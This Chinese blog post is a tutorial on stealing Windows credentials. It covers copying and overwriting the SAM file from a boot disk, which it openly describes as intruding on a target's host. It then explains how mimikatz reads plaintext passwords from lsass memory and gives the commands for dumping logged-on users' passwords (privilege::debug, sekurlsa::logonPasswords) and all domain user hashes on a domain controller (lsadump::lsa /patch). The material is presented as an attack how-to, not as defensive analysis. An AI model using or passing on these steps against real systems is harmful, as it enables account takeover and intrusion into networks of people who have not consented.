使用mimikatz抓取windows管理员密码

基于SAM文件的密码破解

SAM文件即账号密码数据库文件。 当我们登录系统的时候,系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对,如发现此次密码与SAM文件中的加密数据符合时,你就会顺利登录;如果错误则无法登录。在系统运行期间,SAM文件一直是被占用的,是无法打开和编辑复制的,我们可以进入PE系统进行复制然后在利用软件进行密码的修改
U盘启动,运行DiskGenius分区工具
找到 SAM 文件,复制到U盘
在另一台电脑上下载软件 NTPWedit 并运行,打开 SAM 文件,解锁并修改密码,然后把 SAM 文件复制到原来的电脑上,覆盖原文件。或者我们可以直接利用工具(一般的启动盘PE中都有密码重置功能)一键重置。但是这样就完美的暴露了我们入侵了对方的主机
注意:这样只能修改密码,并不能知道密码的明文

Mimikatz是个啥?

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
注意:mimikatz的使用需要administrator权限,否则会提权失败。

mimikatz基础命令

• cls清屏
• exit退出
• version查看mimikatz的版本
• system::user查看当前登录的系统用户
• system::computer查看计算机名称
• process::list列出进程
• process::suspend 进程名称暂停进程
• process::stop 进程名称结束进程
• process::modules列出系统的核心模块及所在位置
• service::list列出系统的服务
• service::remove移除系统的服务
• service::start stop 服务名称启动或停止服务
• privilege::list列出权限列表
• privilege::enable激活一个或多个权限
• privilege::debug提升权限
• nogpo::cmd打开系统的cmd.exe
• nogpo::regedit打开系统的注册表
• nogpo::taskmgr打开任务管理器
• ts::sessions显示当前的会话
• ts::processes显示进程和对应的pid情况等
• sekurlsa::wdigest获取本地用户信息及密码
• sekurlsa::tspkg获取tspkg用户信息及密码
• sekurlsa::logonPasswords获登陆用户信息及密码

抓取windows密码

操作很简单,两步搞定
首先需要提权:privilege::debug
在这里插入图片描述
然后抓取明文密码:sekurlsa::logonPasswords
在这里插入图片描述

使用mimikatz读取域控上所有域用户的hash值

第一步依然是提升权限:privilege::debug
第二步抓取密码:lsadump::lsa /patch
在这里插入图片描述

  • 6
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值